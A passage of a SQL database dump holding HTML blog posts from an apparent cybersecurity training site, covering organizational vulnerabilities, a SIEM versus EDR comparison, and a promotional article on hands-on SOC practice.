[&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Conduct quarterly cybersecurity audits.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Stay informed about emerging threats and trends.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Importance of Continuous Monitoring and Adaptation</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t a one-and-done deal. Threat actors constantly refine their tactics, forcing organizations to evolve their defenses.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Emerging Trends to Monitor:</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Rise of AI-driven cyberattacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Sophisticated ransomware models targeting critical infrastructure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Deepfake technology introducing new phishing methods.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using advanced analytics tools like Darktrace to monitor for anomalies and foster collaboration among all departments can fortify an organization’s security posture.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The weakest link in any organization\'s cybersecurity framework often revolves around human factors. However, with the right combination of employee training, effective tools, and proactive policies, organizations can significantly reduce their risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For cybersecurity learners, it\'s essential to recognize vulnerabilities and explore practical solutions. Start by identifying gaps in your current framework and implementing these best practices.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"></p>', '', NULL, NULL, 1, 'draft', '2025-02-07 02:02:49', '2026-01-12 21:41:44', 'Information Security', 'Identifying and Mitigating Vulnerabilities in Organizational Cybersecurity', '', NULL),
(48, 'SIEM vs. EDR: Which Tools Matter Most in an Organization\'s Cybersecurity Framework?', 'siem-vs-edr-which-tools-matter-most-in-an-organizations-cybersecurity-framework', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is pivotal for modern organizations. With evolving threats, having the right tools in place is paramount. Among the array of cybersecurity solutions, SIEM (Security Information and Event Management) and EDR (Endpoint Detection and Response) have emerged as two essential tools that organizations rely on for detecting and responding to threats. But which one should you prioritize? And how do they complement each other? Let’s explore.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Are SIEM and EDR?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">SIEM (Security Information and Event Management):</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">SIEM solutions aggregate log data from across an organization’s IT ecosystem. Think of it as a “big-picture” tool that collects, correlates, and analyzes security information from various devices, applications, and systems. SIEM excels at providing real-time visibility into security events, enabling teams to pinpoint potential risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">EDR (Endpoint Detection and Response):</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">EDR specifically focuses on monitoring and protecting individual devices or endpoints (e.g., workstations, servers, or mobile devices). It detects suspicious behaviors at the endpoint level and provides remediation capabilities to stop threats in their tracks. Consider it the \"frontline defender\" for your network.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">SIEM vs. EDR: Detecting and Responding to Security Threats</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Both tools play critical roles, but their functions and scopes differ:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Detection Capabilities:</strong></b> SIEM provides a centralized view of an organization’s security posture. It identifies threats by correlating data from multiple sources. EDR, on the other hand, detects threats that specifically target endpoints by analyzing device behaviors and patterns.</li>\r\n</ul>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Response Mechanisms:</strong></b> EDR empowers security teams to act quickly by isolating infected endpoints, removing malware, or rolling back systems to a safe state. SIEM aids response indirectly through comprehensive reporting, alerting, and forensic analysis, helping teams understand the broader context of an incident.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Scope:</strong></b> SIEM watches the entire network, while EDR zeroes in on individual devices. Together, they cover both the macro and micro levels of security monitoring.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How SIEM and EDR Work Together for Comprehensive Security</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While SIEM and EDR can be deployed independently, the real power is in their integration. When these tools work together, they create a holistic security ecosystem:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enhanced Threat Visibility:</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">EDR provides granular insights into endpoint activities, while SIEM correlates those insights with data from the broader IT infrastructure. For instance, if EDR detects a malware attack on an endpoint, SIEM can help trace the attack’s source or uncover related suspicious activities across the network.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Faster Incident Response:</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Integrated SIEM and EDR solutions allow security analysts to identify threats more quickly and respond with precision. While SIEM identifies anomalies and generates alerts, EDR offers containment and remediation options in real time.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Streamlined Workflows:</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Modern security tools often integrate via APIs, creating seamless workflows. Alerts generated by SIEM can be enriched with endpoint data from EDR, ensuring security teams have comprehensive details at their fingertips.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Integration Between SIEM and EDR Is Essential</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The evolving threat landscape requires organizations to take a unified approach to cybersecurity. Integration between SIEM and EDR is no longer a luxury—it’s a necessity. Here’s why:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Holistic Threat Defense:</strong></b> By combining the macro-level focus of SIEM with the micro-level precision of EDR, organizations can defend against a wider range of threats.</li>\r\n</ul>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Reduced Alert Fatigue:</strong></b> SIEM alone may generate a high volume of alerts, some of which may be false positives. EDR helps validate and prioritize these alerts, reducing noise for security teams.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Improved Resource Allocation:</strong></b> Integrated systems reduce redundancies and allow security teams to focus on high-priority issues, optimizing productivity.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-World Applications of SIEM and EDR</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider the following scenarios:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Scenario 1:</strong></b> A financial institution employs SIEM to monitor millions of daily transactions for anomalies while using EDR to protect employees’ devices from phishing attacks. Together, these tools help secure both the network and endpoints.</li>\r\n</ul>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Scenario 2:</strong></b> A healthcare organization integrates SIEM and EDR to protect sensitive patient data. When the SIEM detects unusual login patterns, the EDR isolates the potentially compromised endpoint, preventing further data breaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Scenario 3:</strong></b> A tech startup uses both tools to meet compliance needs. SIEM provides audit trails for regulatory reporting, while EDR ensures endpoint security against potential vulnerabilities.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Choosing the Right Tool for Your Organization</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Selecting between SIEM and EDR—or deciding to deploy both—depends on your organization’s unique needs:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Focus on SIEM if:</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your organization requires broad visibility across the network, compliance reporting, and the ability to analyze security events from multiple sources.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Focus on EDR if:</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your priority is endpoint protection, quick containment of advanced persistent threats (APTs), and detailed forensics at the device level.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Choose Both if:</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">You’re looking for a balanced and comprehensive cybersecurity strategy that addresses both network-wide threats and endpoint-specific risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Critical considerations include your budget, IT environment complexity, and the maturity of your security operations center (SOC).</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Future Trends in SIEM and EDR Technologies</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity landscape is constantly evolving, and both SIEM and EDR technologies are moving toward smarter, more automated solutions:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Artificial Intelligence and Machine Learning:</strong></b> Both SIEM and EDR are leveraging AI to improve threat detection accuracy, automate responses, and provide predictive analytics.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">XDR (Extended Detection and Response):</strong></b> Combining the capabilities of SIEM, EDR, and other tools, XDR represents the future of integrated cybersecurity. It aims to deliver even greater visibility and unified threat management.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Cloud Integration:</strong></b> With more organizations moving to cloud environments, both SIEM and EDR are becoming optimized for detecting, managing, and preventing threats in hybrid and multi-cloud settings.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Zero Trust Architecture:</strong></b> SIEM and EDR are increasingly aligned with zero trust models, ensuring that no endpoint, user, or connection is inherently trusted.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The question isn’t whether SIEM or EDR is important—both are critical in safeguarding organizations against modern threats. While SIEM offers big-picture security visibility, EDR provides in-depth endpoint protection. Their integration enables a comprehensive defense strategy that covers every corner of your IT environment.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Deciding which tool to prioritize comes down to your organization’s unique needs, but in many cases, combining the strengths of both SIEM and EDR yields the best results. By investing in these technologies today, your organization can stay ahead of attackers and be better prepared to tackle the threats of tomorrow.</p>', '', NULL, NULL, 1, 'draft', '2025-02-04 05:00:17', '2026-01-12 21:41:44', 'Information Security', 'SIEM vs. EDR: Which Tools Matter Most in an Organization\'s Cybersecurity Framework?', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(49, 'Why Practice is Essential to Master Cybersecurity', 'why-practice-is-essential-to-master-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Earning certifications is often the first step for aspiring cybersecurity professionals, but it’s not the final step. While certifications provide foundational knowledge, they don\'t guarantee hands-on experience or practical skills—the key elements employers prioritize when hiring candidates.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re preparing to enter the cybersecurity field or aiming to stand out in job interviews, it\'s important to move beyond theoretical learning to actual hands-on practice. Tools like the InfosecLabs SOC Environment are designed to help professionals bridge this critical gap, combining knowledge with practical application in a real-world environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Are Certifications Alone Not Enough?</h3>\r\n[caption id=\"attachment_4736\" align=\"alignright\" width=\"403\"]<img class=\"wp-image-4736\" src=\"https://infoseclabs.io/wp-content/uploads/2025/02/SoldierWithMedals.jpg\" alt=\"\" width=\"403\" height=\"266\" /> Cybersecurity Without Experience[/caption]\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Certifications act as benchmarks, verifying your knowledge of cybersecurity principles. But in a field as dynamic and high-stakes as cybersecurity, theoretical knowledge is no substitute for competence under pressure.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Think of it this way—earning a certification is like watching all the training videos for becoming a soldier and putting those to the LinkedIn profile. It doesn’t mean you’re ready for the operational challenges the job entails. Similarly, certifications in cybersecurity are stepping stones, not proof that you can analyze threats, manage incidents, or operate enterprise-level tools.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Many candidates equipped with multiple certifications struggle to pass interviews, not because they lack knowledge, but because they can’t demonstrate real-world expertise. Employers hiring Security Operations Center (SOC) analysts—roles that often pay $70,000 to $80,000 annually—need candidates who inspire confidence in their ability to use tools effectively, respond to incidents swiftly, and solve problems seamlessly. For this reason, hands-on experience is indispensable.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Importance of Practical, Real-World Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Theoretical knowledge must be paired with practical training for you to effectively meet the demands of cybersecurity roles. That’s where platforms like the <b><strong class=\"font-bold\">InfosecLabs SOC Environment</strong></b> offer game-changing opportunities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike basic simulations, this platform lets you gain hands-on experience in a true SOC environment, working with the same tools that enterprise-level SOC analysts use every day.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Master Enterprise-Level Tools</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the InfosecLabs SOC Environment, you won’t be limited to theory. You’ll gain practical experience using tools like:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Splunk</strong></b> and <b><strong class=\"font-bold\">Wazuh</strong></b> for security information and event monitoring (SIEM)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">CrowdStrike</strong></b> for endpoint detection and response (EDR)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Hive</strong></b> for incident tracking and project management</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">OpenCTI</strong></b> for the latest threat intelligence and artifacts</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Nessus</strong></b>, <b><strong class=\"font-bold\">OpenVAS</strong></b>, and <b><strong class=\"font-bold\">Acunetix</strong></b> for vulnerability scanning and management</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Through hands-on practice with these tools, you’ll master essential SOC operations such as incident response protocols, detailed communication processes, and day-to-day responsibilities of SOC analysts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Hands-On Learning</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how hands-on training benefits aspiring cybersecurity professionals like you:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Confidence to Handle Incidents</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Real-world practice builds confidence. By learning in an authentic SOC environment, you’re equipped to handle complex scenarios with ease.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enhanced Competence</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Being proficient with enterprise tools allows you to apply your knowledge to real-world situations, increasing your ability to contribute value to any organization.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Preparation for High-Stakes Environments</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity field demands rapid responses to evolving challenges. Hands-on training readies you to meet these challenges head-on.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">A Competitive Edge</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike other job seekers who only showcase certifications, your practical experience makes you stand out in interviews, positioning you as a highly capable candidate.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Gain an Edge in Cybersecurity Job Interviews</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A major advantage of completing hands-on SOC training is how it prepares you for job interviews. Instead of only presenting certifications, imagine being able to share real-world scenarios you’ve handled with confidence.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hiring managers often ask questions like:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><strong>“How would you respond to a live cybersecurity threat?”</strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><strong>“What tools have you used for threat detection and incident response?”</strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><strong>“Can you take us through a real-world incident you’ve managed?”</strong></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With practicing from <b><strong class=\"font-bold\">InfosecLabs</strong></b>, you’ll have concrete answers to these questions, backed by practical experience in handling enterprise-level cybersecurity operations. This not only impresses employers but also ensures they trust you in critical situations.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Not Just Learning—Mastering the SOC Environment</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The <b><strong 